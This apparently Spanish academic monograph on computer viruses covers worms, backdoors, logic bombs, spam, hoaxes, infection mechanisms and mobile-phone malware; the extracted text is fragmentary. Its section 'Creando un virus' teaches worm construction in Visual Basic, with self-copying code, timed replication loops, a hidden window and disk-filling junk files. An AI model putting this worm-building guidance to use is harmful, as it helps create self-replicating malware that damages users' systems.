produciendo un efecto dominó de obstrucción del tráfico de red que ralentizaría las
redes de las empresa e Internet en general. Cuando aparecen nuevos gusanos, se
extienden rápidamente, atascando las redes y, posiblemente, haciendo que los
usuarios tengan que esperar hasta el doble de tiempo para ver páginas Web en
Internet.
Esta amenaza generalmente se propaga sin que el usuario realice ninguna acción
y distribuye copias completas (posiblemente modificadas) de sí mismo por las
redes. Un gusano puede consumir memoria o ancho de banda de la red, haciendo
así que un equipo deje de responder. Debido a que los gusanos no necesitan
desplazarse mediante un archivo o programa "anfitrión", también pueden crear
agujeros en el sistema que permiten que alguien penetre y tome el control del
equipo de forma remota. Un ejemplo es el reciente gusano MyDoom el cual
estaba diseñado para abrir una "puerta trasera" en sistemas infectados y utilizar
esos sistemas para atacar sitios Web.
Los Gusanos son programas que tienen como única misión la de colapsar
cualquier sistema, ya que son programas que se copian en archivos distintos en
cadena hasta crear miles de replicas de si mismo. Así un” gusano” de 866 Kb,
puede convertirse en una cadena de ficheros de miles de Megas, que a su vez
puede destruir información, ya que sustituye estados lógicos por otros no idénticos
(Microsoft, 2005)42.
42
proceso de auto replicado llena normalmente el ancho de banda de trabajo de un
servidor en particular (Hernández, 2005)31.
Este código sigue el mismo principio que los virus. Son programas que intentan
replicarse a sí mismos para conseguir una propagación máxima. Aunque no es su
principal característica, también pueden contener una bomba lógica con un
detonador retardado. La diferencia entre los gusanos y los virus la da el hecho de
que los gusanos no utilizan programas host como medio de transporte, sino que
se benefician de las capacidades que proveen las redes, como el correo
electrónico, para propagarse de máquina en máquina (Blaess, 2005)8.
43
ver con un virus. Se debe tener cuidado con los mensajes que advierten que se ha
enviado un mensaje que es portador de un virus. Esto puede significar que el virus
ha colocado la dirección del correo electrónico como remitente de un correo
infectado. No significa necesariamente que este tenga un virus.
Las Backdoors representan una de las formas típicas de actuación de los piratas
informáticos, donde tienen la posibilidad de introducirse en los diversos sistemas
por una puerta trasera. Estos programas no se reproducen solos como los virus,
sino que son enviados con el fin de tener acceso a equipos, muchas veces a
través del correo electrónico, por lo que la mayoría de las veces no son fáciles de
detectar y no siempre causan daños ni efectos inmediatos por su sola presencia,
siendo así que pueden llegar a permanecer activos mucho tiempo sin que sean
detectados. Generalmente las Backdoors se hacen pasar por otros programas, es
decir, se ocultan en otro archivo que les sirve de caballo de Troya para que el
usuario los instale por error. Lo peor que puede pasar cuando se está en el
Messenger o en el ICQ no es contagiar el PC con un virus. Lo peor es que alguien
instale una backdoor en el equipo. Las puertas traseras se basa en la arquitectura
cliente / servidor, sólo se necesita instalar un programa servidor en una máquina
para poder controlarla a distancia desde otro equipo, si se cuenta con el cliente
adecuado, esta puede bien ser la computadora de un usuario descuidado o poco
informado.
44
programa maravilloso y tentador que en realidad es un Troyano el cual es portador
de un servidor que proporcionará a algún intruso el acceso total a la computadora.
(Moreno, 2005)45.
Con todo el riesgo que esto implica, la forma más simple y totalmente segura de
evitarlo es no aceptar archivos ni mucho menos ejecutar programas que hayan
sido enviados de origen dudoso. Los programas que se clasifican como
backdoors o "puertas traseras" son utilidades de administración remota de una
red que permiten controlar los equipos conectados a ésta. El hecho que se les
clasifique como software malévolo en algunos casos, es que cuando corren, se
instalan en el sistema sin necesidad de la intervención del usuario y una vez
instalados en el ordenador, no se pueden visualizar estas aplicaciones en la lista
de tareas en la mayoría de los casos.
Las puertas traseras backdoors se pueden comparar con los Troyanos pero no
son idénticas. Una puerta trasera permite a un usuario avanzado actuar en una
aplicación para cambiar su comportamiento. Se puede comparar con los cheat
codes usados en los juegos para obtener más recursos, alcanzar un nivel
superior, etc. Pero también afectan las aplicaciones críticas como autentificación
de conexiones o correo electrónico, ya que pueden tener un acceso oculto con
una contraseña conocida sólo por el creador del software.
45
era que cualquier administrador podía recompilar login.c eliminando así la versión
falsa. Entonces, Thompson modificó el compilador estándar de C para hacerle
capaz de incluir la puerta trasera cuando notara que alguien intentaba compilar
login.c. Pero, de nuevo, el código fuente del compilador cc.c estaba disponible y
cualquier persona podría leer y recompilar el compilador. Así pues, Thompson
puso un código fuente limpio del compilador, pero el fichero binario, ya procesado,
era capaz de identificar sus propios ficheros fuente, incluyendo el código usado
para infectar login.c.
En algunos casos la bomba lógica puede estar escrita para un sistema objetivo
específico en el que se intentaría robar información confidencial, destruir ciertos
ficheros o desacreditar a un usuario tomando su identidad. La misma bomba
ejecutada en cualquier otro sistema será inofensiva (Blaess, 2005)8.
46
La bomba lógica o de tiempo también puede intentar destruir físicamente el
sistema en el que reside. Las posibilidades son muy pequeñas pero existen
(borrado de memorias CMOS, cambio en la memoria flash de modems,
movimientos destructivos de cabezales de impresoras, plotters, escáneres,
movimiento acelerado de las cabezas lectoras de los discos duros, etc.)
Al igual que un virus las bombas lógicas están especialmente diseñadas para
hacer daño. Existen dos definiciones del mismo acrónimo o programa asociado.
Una es la de crear un subprograma que se active después de un tiempo llenando
la memoria del ordenador y otra es la de colapsar el correo electrónico. De
cualquier forma ambos son dañinos, pero actúan de forma diferente.
En el segundo caso, alguien envía una bomba lógica por e-mail que no es sino
que un mismo mensaje enviado miles de veces hasta colapsar nuestra maquina.
Los programas antivirus no están preparados para detectar estos tipos de bombas
lógicas, pero existen programas que pueden filtrar la información repetida. De
modo que la única opción que tienen para hacer daño es introducir una bomba
47
lógica que se active frente a determinadas circunstancias externas (Hernández,
2005)31.
48
los servicios en línea de Internet o bien buscando direcciones por la red.
Irónicamente, los propios spammers usan el spam para anunciarse (Álvarez,
2005)6.
Listas comerciales: existen personas que venden listas de correo electrónico a los
spammers, y las obtienen en encuestas, y bases de datos comerciales de
distintas empresas.
Mail Servers mal configurados: los llamados “open relay servers” y proxies
abiertos permiten actuar de escalón hacia la anonimidad de los spammers.
Cuentas “one time”: son las que se utilizan para enviar spam hasta que son
dadas de baja.
Cadenas de mensajes
Esquemas de "gane plata rápidamente"
Avisos de servicios y/o sitios pornográficos
Avisos de servicios de envío de spam
Avisos de software y bases de datos para hacer spam
Ofertas de hosting
Avisos de acciones de empresas nuevas
Productos milagrosos de dudoso efecto y origen
Software ilegal, películas y/o música pirateada
49
Analizar el e-mail y "etiquetarlo", según varios criterios: origen, tamaño, tema,
contenido, etc.
Una solución anti-spam podrían ser los Filtros bayesianos, La Lógica bayesiana,
creada por el matemático inglés Thomas Bayes en 1763, se basa en las
estadísticas y las probabilidades para predecir el futuro. Por ejemplo, la palabra
"sexy" es muy probable que aparezca en un correo basura. A partir de aquí, es
fácil escribir un algoritmo que filtre los mensajes que contengan palabras
'peligrosas' y este aprenda con el tiempo.
5.4.7 Hoax. En la actualidad hay miles de que virus descubiertos cada año,
pero hay algunos que solamente existen en la imaginación del público y la
prensa. Esta serie de virus no existen, a pesar del rumor de su creación y
distribución, por esto se debe ignorar cualquier mensaje con respecto a estos
supuestos "virus" y no pasar ningún mensaje sobre ellos. El reenviar mensajes
sobre estos "virus-engaño" solamente sirve para fomentar su propagación.
Una de las características mas destacadas que se puede observar es lo que bien
pudiera llamarse "el fenómeno Internet" son los lazos que se generan entre los
integrantes de la red global. El crecimiento que se produce día a día en los foros
50
temáticos, de la mano de este fenómeno, se observa otro, el cual es la solidaridad
que se establece entre los participantes, que a su vez se acompaña de un
producto marginal. El Hoax se aprovecha de la unión que existe entre las
comunidades de Internet y por esto en lo buzones de correo electrónico, aparecen
los mensajes que previenen sobre destructivos virus que podrían llegar a los
equipos de los usuarios incorporados en otros mensajes y que piden se haga
propaganda de la alerta difundiéndolo a toda dirección de correo que se halle en la
lista de direcciones.
Los mensajes de engaño, son redactados con un lenguaje apropiado que le otorga
credibilidad por parte de quien lo recibe, son falsos y en realidad son la "propia
enfermedad" sobre la cual aparentemente previenen, aprovechando el temor que
tiene la gente a los virus informáticos y a su solidaridad para prevenir que
personas conocidas sean infectadas. La mejor "vacuna" contra estos mensajes es
no prestar atención al contenido alarmista que estos llevan.
Existen varios métodos para identificar los virus Hoax, pero primero se debe tener
en consideración que hace que un "virus" de estas características tenga éxito en
Internet.
Hay dos factores conocidos que son: (A) lenguaje que impresiona "técnico", y (B)
credibilidad por asociación. Si la advertencia utiliza el lenguaje técnico apropiado,
la mayoría de las personas, incluyendo quienes estén informados sobre
cuestiones tecnológicas, se inclinan a creer que la advertencia es real. Por
ejemplo, el Hoax "Good Times" dice que "...si el programa no se detiene, el
procesador de la computadora será colocado en un bucle binario infinito de
enésima complejidad, que puede dañar gravemente el procesador...".
La primera vez que el usuario lee esto, le impresiona como si pudiera haber algo
de verdad en él. Si se investiga un poco, se descubre que no existe tal cosa como
un bucle binario infinito de enésima complejidad y que los procesadores están
diseñados para ejecutar bucles durante semanas a la vez sin dañarse. Cuando se
menciona "credibilidad por asociación", se hace referencia a quien es el supuesto
remitente que envía la advertencia. Si es un usuario perteneciente a una
organización tecnológica importante el envía la advertencia a alguien fuera de la
organización, la gente del exterior tiende a creer en la advertencia porque la
empresa debería tener conocimiento de tales asuntos (Morlans, 2005)48.
Aunque el usuario que envía el mensaje no tenga idea de lo que esta hablando, el
prestigio de la empresa lo respalda, dándole una apariencia real. Si un gerente de
la empresa envía la advertencia, el mensaje esta doblemente respaldado por las
reputaciones de la compañía y del gerente.
Los destinatarios de estos mensajes deberían estar especialmente atentos si la
advertencia los incita a reenviar el mensaje a las listas de correo. Esto debería ser
como una alerta roja indicando que el mensaje puede ser un Hoax. Otra señal de
51
alerta a la que se debe prestar atención es cuando el mensaje indica que es una
advertencia del FCC (Federal Communication Commission - Comisión Federal
de Comunicaciones). Según el FCC, no han difundido, y nunca difundirán
mensajes de advertencia sobre virus, ya que no es parte de su trabajo.
Ningún virus puede venir en el texto de un mensaje. Si, en cambio, puede hacerlo
en un archivo adjunto que se recibe junto a un mensaje y que en este caso, la
mejor protección es desconfiar y no ejecutar el archivo adjunto que se recibe de
fuentes desconocidas y aun conocidas cuando previamente no se tiene
conocimiento del envío (Morlans, 2005)48.
Dejando a un lado los temibles Virus y los caballos de Troya entre otros, existen
otras amenazas en la red prediseñados para monitorear el paso de datos en línea
donde se toman prestados algunos passwords y números de tarjetas de crédito.
Estos programas capaces de monitorear a alguien en particular o todo aquello que
se mueve en la red, reciben el nombre de Sniffers y como su nombre lo indica, son
programas capaces de interpretar todos los datos de la red, copiarlos y
modificarlos. Otras amenazas son los buscadores de puertos libres IRQ, con estos
programas se pueden localizar puertos libres o abiertos y entrar por ellos a otros
sistemas. A veces estos puertos contienen Bugs. Fallos y los hackers las
emplean para penetrar en los sistemas (Hernández, 2005)31.
5.6.1 El contagio. El contagio es quizás la fase más fácil de todo este arduo
proceso. Solo hay que tener en cuenta que el virus debe introducirse o liberarse
en la red. El virus debe ir incrustado en un archivo de instalación o en una simple
pagina Web a través de los cookies. Las vías de infección son también
principalmente los diskettes, programas copiados, Internet o el propio correo
electrónico, en este ultimo caso el contagio es considerado como masivo y por lo
tanto, muy peligroso, como lo fueron los virus Melissa o I Love You (Hernández,
2005)31.
5.6.2 La incubación. Normalmente los virus se crean de formas especificas que
atienden a una serie de instrucciones programadas como el ocultarse y
reproducirse mientras se cumplen unas determinadas opciones predeterminadas
52
por el creador del virus. Así, el virus permanece escondido reproduciéndose en
espera de activarse cuando se cumplan las condiciones determinadas por el
creador. Este proceso puede ser muy rápido en algunos casos y bastante largo,
según el tipo de virus.
Para cada una de estas partes tenemos un tipo de virus, aunque muchos son
capaces de infectar por sí solos estos tres componentes del sistema. En los
diskettes, el sector de arranque es una zona situada al principio del disco, que
contiene datos relativos a la estructura del mismo y un pequeño programa, que se
ejecuta cada vez que arrancamos desde diskette.
53
disquetes a los que se accedan, ya sea al formatear o al hacer un DIR en el disco,
dependiendo de cómo esté programado el virus.
Normalmente un virus completo no cabe en los 512 bytes que ocupa el sector de
arranque, por lo que en éste suele copiar una pequeña parte de si mismo, y el
resto lo guarda en otros sectores del disco, normalmente los últimos, marcándolos
como defectuosos. Sin embargo, puede ocurrir que alguno de los virus no
marquen estas zonas, por lo que al llenar el disco estos sectores pueden ser
sobrescritos y así dejar de funcionar el virus.
La tabla de partición esta situada en el primer sector del disco duro, y contiene una
serie de bytes de información de cómo se divide el disco y un pequeño programa
de arranque del sistema. Al igual que ocurre con el boot de los disquetes, un virus
de partición suplanta el código de arranque original por el suyo propio; así, al
arrancar desde disco duro, el virus se instala en memoria para efectuar sus
acciones. También en este caso el virus guarda la tabla de partición original en
otra parte del disco, aunque algunos la marcan como defectuosa y otros no.
Casi todos los virus que afectan la partición también son capaces de hacerlo en el
boot de los diskettes y en los archivos ejecutables; un virus que actuara sobre
particiones de disco duro tendría un campo de trabajo limitado, por lo que suelen
combinar sus habilidades. El tipo de virus que más abunda son los de archivo; en
este caso usan como vehículo de expansión los archivos de programa o
ejecutables, sobre todo .EXE y .COM, aunque también a veces .OVL, .BIN y .OVR
(El Hacker, 2005)20.
54
su código al principio y al final de éste, y modificando su estructura de forma que
al ejecutarse dicho programa primero llama al código del virus devolviendo
después el control al programa portador y permitiendo su ejecución normal.
El virus al adherirse al archivo hace que este aumente de tamaño al tener que
albergar en su interior al virus, siendo esta circunstancia muy útil para su
detección. De ahí que la inmensa mayoría de los virus sean programados en
lenguaje ensamblador, por ser el que genera el código más compacto, veloz y de
menor consumo de memoria; un virus no seria efectivo si fuera fácilmente
detectable por su excesiva ocupación en memoria, su lentitud de trabajo o por un
aumento exagerado en el tamaño de los archivos infectados. No todos los virus de
fichero quedan residentes en memoria, si no que al ejecutarse el portador, éstos
infectan a otro archivo, elegido de forma aleatoria un directorio (El Hacker, 2005)20.
- Documentos con macros: por regla general, los archivos que no sean programas,
no son infectados por ningún tipo de virus. Sin embargo, existen determinados
tipos de documentos (ficheros o archivos) con los que el usuario puede trabajar, o
que puede crear, que permiten incluir en ellos lo que se denomina macro.
Una macro es un conjunto de instrucciones o acciones que otro programa puede
llevar a cabo. Pues estas macros pueden formar parte del documento (texto, hoja
de cálculo o base de datos) y por tratarse de programas pueden ser infectados por
los virus (virus de macro).
55
pudiendo estar infectados. Generalmente, cuando se reciben el destinatario no
sospecha que el fichero recibido puede contener un virus o que este lo sea, pero
al abrir el mensaje y posteriormente abrir el fichero que dentro de él se incluye
podría llevarse una sorpresa desagradable.
1. La mejor herramienta para combatir los virus es saber como actúan, infectan y
se propagan.
3. Hacer siempre una copia de seguridad de los datos en caso de que un virus
dañe irreparablemente los archivos (Alerta virus, 2005)4.
56
5. La última línea de defensa es tener software antivirus instalado en el
ordenador. Lo ideal es que hubiera dos o más paquetes de software diferentes
de antivirus. El software antivirus no es efectivo a no ser que esté actualizado.
Los antivirus se fían de la información de sus fabricantes para mantenerlos
informados sobre cuales son los últimos virus y como combatirles. Esta
información les llega en forma de un archivo de definición. Un antivirus debería
estar actualizado a menudo (cada 2 semanas). Esto asegurará que el antivirus
está funcionando con lo último cuando chequee y limpie los nuevos virus (Alerta
virus, 2005)4.
57
6. CREANDO UN VIRUS
Primer carácter:
Ejemplos:
58
Después de los tres primeros caracteres, la barra "/" y un nombre, algunas veces
suele ser alguna cadena de texto que se puede encontrar dentro del virus,
otras veces el nombre lo ha puesto el propio programador del virus, en algunas
ocasiones incluso se usa un número que indica el tamaño en octetos que ocupa
el virus.
Ejemplo: VBS/Loveletter
W32/Petador
En algunas ocasiones, un virus puede ser una mutación o variante de otro, por lo
que se indica con una letra adiccional separado del nombre con un punto:
Ejemplo: VBS/Loveletter.A
VBS/Loveletter.B
W32/Petador.A
W32/Petador.B
Flip
Barrotes
4096
(Google, 2005)29.
[nombre_de_sección]
variable_1=valor_1
variable_2=valor_2
...
variable_n=valor_n
59
Por ejemplo, en la sección CD-ROM (si es que existía una) podría haberse leído
algo como lo siguiente:
Driver=C:\windowssystemcdrom.drv
Nombre dispositivo=Sony CDU 99 4/A
Cache=512
Por este motivo el registro de Windows que antes era un simple TXT pasó a ser
un archivo binario (una base de datos) que sólo puede ser editado con un
programa para tal fin. El programa que da Microsoft para hacer esto es el
REGEDIT. Ver figura 1.
Este no fue el único cambio que se realizó sobre los archivos de inicio que ahora
se llaman Registro, ahora por ejemplo no sólo se pueden crear "subsecciones"
llamadas "llaves" o en inglés keys (por ejemplo la subsección que antes era "CD-
ROM") sino que se pueden crear unas dentro de otras como si se trataran de
subdirectorios.
60
Con el REGEDIT.EXE se pueden recorrer estas secciones con facilidad y
modificar las variables que en ellas se encuentren. Para ejecutar el Regedit se
debe entrar en la opción Ejecutar del menú inicio y escribir y Regedit luego
aceptar (Donatién, 2005)18.
Se debe tener en cuenta que alguna modificación a las opciones que Windows
lee al reiniciar puede causar que algún elemento de la computadora no funcione
correctamente la próxima vez.
También existen otros DLLs que, aunque menos importantes, también se aplican
a los programas:
61
Un programador que utilice aplicaciones para Windows en este caso que haga
uso de este recurso para crear virus, además de conocer el entorno de trabajo de
Windows debe conocer también su entorno de programación, al que se le conoce
generalmente como interfaz de programación de aplicaciones de Windows
(Windows Application Programming Interface, abreviadamente Windows API).
La característica primaria de la API de Windows son las funciones y los mensajes
internos/externos de Windows (FalKen, 2005)25.
Las funciones Windows son el corazón de las aplicaciones Windows. Hay más
de 600 funciones de Windows dispuestas para ser llamadas por cualquier
lenguaje, como C o Visual Basic. A través de estos mecanismos, se puede
realizar gran cantidad de funciones. La utilización de ésta serie de librerías que
contienen las funciones de la API pueden solucionar gran cantidad de problemas
en la programación, aunque por otro lado no se debe desestimar el gran poder
destructivo de las mismas.
Las dos principales ventajas que se obtiene con la utilización de APIs es la gran
funcionalidad que se le puede dar a una aplicación, y en segundo lugar la gran
velocidad de proceso, ya que a menudo es mucho más rápido realizar una función
a través de la API adecuada que por medio del lenguaje en si mismo.
Los mensajes son utilizados por Windows para permitir que dos o más
aplicaciones se comuniquen entre sí y con el propio sistema Windows. Se dice
que las aplicaciones Windows son conducidas por mensajes o sucesos.
Conocer todas las APIs de Windows es imposible, ya que tiene gran similitud con
el hecho de tener que aprenderse el directorio telefónico. Lo que se debe hacer es
realizar un razonamiento contrario, al tener una necesidad al programar, y se debe
pensar que eso tiene alguna solución con una API.
6.3.2 Que son las librerías Dinámicas (DLLs). Casi todas las APIs de
Windows se unen formando librerías de enlace dinámico. Una librería dinámica
(Dynamic Link Libraries, abreviadamente DLLs) permite que las aplicaciones
Windows compartan código y recursos. Una DLL es actualmente un fichero
ejecutable que contiene funciones de Windows que pueden ser utilizadas por
todas las aplicaciones. Si bien en DOS se utilizaban librerías de enlace estático,
es decir, a la hora de compilar se incluían junto con el código, y de esta manera
cuando se ejecutaba la aplicación, todas las librerías se cargaban en memoria
esperando a ser invocadas.
62
Sin embargo, cuando se trabaja con DLLs, el enlace con la aplicación es dinámico
en tiempo de ejecución. Una DLL no se incluye dentro del código, sino que en el
momento en que se realiza la llamada a la función, la DLL se carga en memoria,
se utiliza la API, y a continuación se descarga.
La gran ventaja que posee este método es que no es necesario tener gran
cantidad de código cargado en memoria a la hora de ejecutar la aplicación. Por el
contrario, es necesario que cuando se lleve el ejecutable a otra instalación, se
tenga que llevar las DLLs necesarias (FalKen, 2005)25.
Pero si se tiene que pensar que si se utilizan las DLLS que proporciona Windows,
en cualquier máquina con este sistema operativo vamos a encontrar esas mismas
DLLs, con lo cual no es necesario que se tenga que cargar con ellas.
Pero también tienen inconvenientes. Uno de ellos es el tiempo que Windows tiene
que emplear en leer las funciones que el programa necesita utilizar de una DLL.
Otra desventaja es que cada programa ejecutable necesita que estén presentes
las DLLs que utiliza.
63
Private Sub Form_Load()
End Sub
Estas son las etiquetas principales, el inicio y el final del programa, que de aquí en
adelante será referenciado como “formulario” (Kuasanagui, 2005)37.
Private Sub Form_Load() ----------- es la primera línea de código que se lee del
formulario
End Sub ----------- es la etiqueta que da fin a la rutina
Figura 3. Form
64
6.5 SUBRUTINAS
Sub Form_Load()
hola_mundo
End Sub
Sub hola_mundo()
MsgBox "¡Hola Mundo!"
End Sub
6.6 FileCopy
Es el comando que copia archivos en Visual Basic. Esta es la sintaxis para copiar
el Worm en cuestión:
Ejemplo:
6.7 App.EXEName
Para solucionar este problema se tiene este comando que copia el archivo sin
importar el lugar donde esté ubicado, esta es “App.EXEName”, con esta
instrucción se obtiene el nombre de la aplicación, esto es útil, ya que así el worm
no dependerá de un solo nombre, el comando se encarga de averiguarlo.
Sub Form_Load()
FileCopy App.EXEName & “.EXE” , “C:\GusanoClon.EXE”
End Sub
65
A diferencia de lo hecho con el programa holamundo, en este caso es necesario
crear el ejecutable previamente, de lo contrario se generará un mensaje de error.
Si se desea crear una copia del Worm en el directorio en que se ejecuta, en lugar
de escribir el nombre de la unidad, se escribe un punto y la diagonal: “.\” Visual
Basic entenderá que se pretende copiar en el directorio actual. (Kuasanagui,
2005)37.
A veces se deja una firma o un mensaje en un archivo .txt. Para crear archivos,
escribir y cerrar en Visual Basic se utilizan los siguientes comandos.
Cada vez que se abra o se cree un archivo hay que asignarle un número para
que si se realizan varias aperturas y escrituras estas sean fácilmente identificadas
por el programa.
Esto quiere decir: Abrir o crear el archivo, prepararlo para escritura, y asignarle el
numero 1, escribir dentro de 1 un texto y cerrar a 1.
66
De esta manera se pueden dejar firmas en archivos TXT o también crear archivos
con cualquier extensión como EXE o MP3, y aunque esos archivos no funcionen,
servirán para saturar el disco duro de la victima generando basura (Kuasanagui,
2005)37.
6.10 MINUTE(NOW)
Ahora se explica como hacer una rutina que controle el tiempo de copiado del
worm. En Visual Basic existen comandos para obtener las horas, minutos y
segundos del sistema, uno de ellos es Minute(Now), que será usado primero. Se
evaluará ahora una situación de copiado con IF.
Sub Form_Load()
On Error Resume Next
If Minute(Now) = 3 Then FileCopy App.EXEName & ".EXE",
".\HijodelGusano.EXE"
End Sub
67
Ahora, esta condición solo seria evaluada una sola vez, pero si se incluye dentro
de un ciclo Do el worm estaría residente en la PC, verificando en cada instante si
el minuto actual del sistema es 5, copiándose si son las 12:05, las 6:05, etc...
Ejemplo:
Sub Form_Load()
Do
If Minute(Now) = 4 Then FileCopy App.EXEName & ".EXE", ".\GusanoClon.EXE"
Loop
End Sub
(Kuasanagui, 2005)37.
6.11 SECOND(NOW)
Sub Form_Load()
On Error Resume Next
Do
If Minute(Now)= 5 And Second(Now) = 5 Then FileCopy App.EXEName & ".EXE",
".\K.EXE"
Loop
End Sub
Este al compilarlo y ejecutarlo hará que se copie al directorio actual cada vez que
el minuto y el segundo coincidan con la condición establecida.
68
6.12 OCULTAR EL FORMULARIO DEL PROGRAMA
Para ocultar los formularios del programa a la vista del usuario, se debe ir a la
ventana propiedades y en la opción “Visible”, se cambia de “True” a “False”. Ver
Figura 5 (Kuasanagui, 2005)37.
69
6.13 CÓDIGO EN VB DE UN WORM RESIDENTE
70
7. EL FUTURO DE LOS VIRUS
Algunas conjeturas que pueden ser una ojeada a las posibles características de
los futuros virus:
- Las fallas de seguridad serán explotadas para tener una mayor cobertura de
infección.
El estudio demuestra que las técnicas que utilizan los gusanos actuales para
propagarse son extremadamente ineficientes. En cambio, según este estudio, los
“gusanos Warhol” utilizarían técnicas altamente optimizadas para buscar
ordenadores vulnerables: “hitlist scanning” (lista de servidores vulnerables
elaborada previamente) para la propagación inicial y “permutation scanning”
(técnica que intenta encontrar todos los ordenadores vulnerables en el menor
tiempo posible) para conseguir propagarse de forma auto-coordinada y completa
(Iñaki, 2005)35.
71
El principal problema de este tipo de gusanos es que causarían el daño máximo
antes de que fuese posible una respuesta humana. Para cuando los laboratorios
de las casas antivirus fuesen capaces de desarrollar, probar y poner a disposición
de los usuarios la solución, el virus ya habría terminado su trabajo.
72
El futuro exacto de lo que serán los virus es difícil de predecir, pero definitivamente
van a resultar mucho más dañinos y difíciles de combatir. Las nuevas tecnologías
y los defectos de software continúan haciendo la propagación de los virus más y
más fácil, y las técnicas antivirus tienen que evolucionar para poder mantener el
mismo paso.
73
Hasta ahora, las compañías dedicadas a la preservación de la seguridad y
privacidad en el mundo de la computación y la Web, no tienen solución aún para
este tipo de amenaza. Cierto software de protección anunciara cuando un sitio
está tratando de descargar algo hacia la PC del usuario, pero la mayoría de los
cortafuegos aun no son capaces informar cuando un sitio está extrayendo
información del equipo. Sin embargo la última versión del cortafuego y servicio de
privacidad personal de McAfee.com informa a los usuarios que están explorando
la Web cuando un sitio determinado está tratando de leer archivos o tomar
información (Miastkowski, 2005)41.
La novena edición (2004) del CSI/FBI Computer Crime and Security Survey,
indica como los ataques por virus y la negación de servicio, sobrepasaron las
pérdidas registradas por el robo de información; sólo los ataques por virus
alcanzaron unos $ 55 millones anuales según reportaron las 491 empresas
encuestadas (Figura 6).
Estas cifras revelan que hoy en día existe una mayor preocupación por detener las
consecuencias de estos programas que fueron creados inicialmente sin una
intención perniciosa, y que hoy en día representan un “dolor de cabeza” para los
responsables de mantener la operatividad y la seguridad de la información.
Fuente: CSI/FBI 2004 Computer Crime and Security Survey (Espiñeira, 2005)23.
74
En los últimos años se ha notado una rápida evolución de los códigos maliciosos,
los cuales son capaces de infectar de diferentes formas y en diferentes
plataformas e incluso de defenderse y desactivar algunos productos antivirus. Es
por este motivo que también los antivirus han tenido que evolucionar para proteger
mejor la información que los usuarios guardan en sus computadoras.
El futuro de los virus en los próximos años puede estar enfocado a la llegada de
nuevo hardware móvil como tarjetas de memoria, computadoras de bolsillo y
teléfonos celulares con mayores opciones, parece ser que el nuevo objetivo de los
creadores de virus y códigos maliciosos en general será precisamente estos
nuevos dispositivos, como esta empezando a suceder en Europa en donde la
telefonía celular ha crecido en gran proporción.
La mejor forma para que el usuario este protegido es mantenerse al día sobre las
amenazas y riesgos de seguridad que van surgiendo en los equipos que se
tengan, además de obtener las últimas herramientas que se encuentren
disponibles por parte de los fabricantes (Saavedra, 2005)60.
75
Al respecto, la compañía de seguridad informática Symantec previene que los
ataques de hackers contra sistemas de telefonía IP irán en aumento, a la par con
la propagación de tales sistemas (Diarioti, 2005)17.
Muchas personas alrededor del mundo usan teléfonos celulares para establecer
una comunicación local o de larga distancia. Sin embargo, con los celulares de
recientes generaciones se tienen más servicios y aplicaciones: fotografía, video,
juegos multimedia, envío y recepción de correos electrónicos o mensajes
instantáneos, navegación en Internet, etc. Poco a poco, el teléfono celular se ha
transformado de un dispositivo de comunicación auditiva básica a virtuales centros
de entretenimiento y asistencia de información personal.
Para lograr las nuevas funcionalidades que tiene un teléfono celular se necesita
cierta inteligencia, además es indispensable contar con un sistema operativo.
Symbian es uno de los más importantes y funcionales, aunque existen otros como
Palm® que funciona en asistentes digitales personales (PDA, por sus siglas en
inglés), los cuales se hicieron populares por su interfaz que utiliza una pluma
76
electrónica y reconoce la escritura a mano en su pantalla; o Windows CE de
Microsoft®, una variante del sistema operativo Windows, que se integra a
diversos dispositivos electrónicos con mínima capacidad de almacenamiento,
incluyendo PDAs y teléfonos móviles (Rodríguez, 2005)59.
77
Cada aplicación se puede instalar en el teléfono con la ayuda de una
computadora, una interfaz USB o Firewire, dependiendo del modelo de teléfono y
el cable correspondiente. Las aplicaciones se graban en la memoria flash del
teléfono dentro del proceso de sincronización de archivos, contactos y correos
electrónicos (Rodríguez, 2005)59.
Servicios Protocolos
Redes TCP/IP, SSL, FTP, etc.
Comunicaciones Bluetooth, WiFi
Navegadores de Internet HTML, HTTPS, WAP
GSM, GPRS, CDMA2000,
Telefonía
EDGE, WCDMA
Multimedia WAV, JPEG, MP3, etc.
78
7.2 LOS VIRUS EN CELULARES
Una prueba más de esta tendencia son los datos que facilita la compañía de
seguridad F-Secure, quien ya ha detectado 87 programas malignos para móviles,
la mayoría de ellos (82 de los 87 programas) tenían como objetivo el sistema
operativo serie 60 de de Symbian. Sin embargo, esto se debe a que es el sistema
más popular, no a que este sea el más inseguro (Herranz, 2005)32.
Nokia, ha sido el caldo de cultivo con el cual se han reproducido estos virus
informáticos que afecta a los móviles. El número de afectados puede ser sólo de
unas docenas de terminales, pero la cifra no deja de ser importante. Según
portavoces de la operadora TeliaSonera, el código dañino se ha extendido en un
corto periodo de tiempo.
79
Cabir se detectó por primera vez en junio del 2004. Este aprovecha la conexión
Bluetooth que incorporan los teléfonos de última generación para expandirse
(Muñoz, 2005)51.
El usuario del teléfono móvil afectado recibe por esta vía un mensaje en el que se
le pide que descargue un programa, si lo hace y lo instala, resultará infectado. El
virus se dedicará entonces a reenviarse a otros móviles hasta agotar la batería del
aparato infectado (Muñoz, 2005)51.
Esto fue demostrado en los modelos de telefonía celular Nokia 6210, 3310 y 3330,
pero no se descarta afecte a modelos de otros fabricantes, ya que simplemente no
se han efectuado pruebas con ellos todavía. Si el celular recibe el mensaje, el
teléfono literalmente "se cuelga", y es imposible que este vuelva a encender. La
clave del contagio esta en la manipulación y modificación malintencionada del
titulo de la información enviada (técnicamente la llamada User Data Header).
Nokia no se sorprende que el bloqueo pueda ocurrir (ya que parece suceder por si
solo en contadas ocasiones), pero si confesó no conocer que se pudiera hacer en
forma premeditada como se demostró en la conferencia (Vsantivirus, 2005)70.
80
Pero en septiembre del 2005, aparecieron nuevos virus como el Commwarrior. B
y Skulls que funcionan de modo distinto al Cabir, pues son Troyanos que se
filtran en los celulares camuflados en otros programas aparentemente inofensivos.
Commwarrior. B entra con el programa Doomboot.A y se le atribuye potencial
para extenderse mediante mensajes multimedia; aunque realmente no ha
conseguido autoenviarse en ninguno de los casos detectados en celulares, por lo
que su efecto más nocivo es la brusca descarga de la batería. También es
exclusivo de los celulares con el sistema operativo Symbian. En este caso no hay
acuerdo sobre su foco de infección: mientras algunos expertos se inclinan por la
posibilidad del Bluetooth como vía, otros apuntan a la descarga de juegos Java
para móvil desde Internet.
Si bien Skull es mucho más nocivo, entre sus funciones no está el propagarse de
móvil a móvil, pero se propaga al descargarse desde la red. Skull se encuentra en
algunas páginas de software para Symbian, donde aparece camuflado bajo la
frase Extended Theme Manager para el modelo Nokia 7610. En realidad se trata
de un Troyano nocivo que desactiva aplicaciones internas del teléfono como
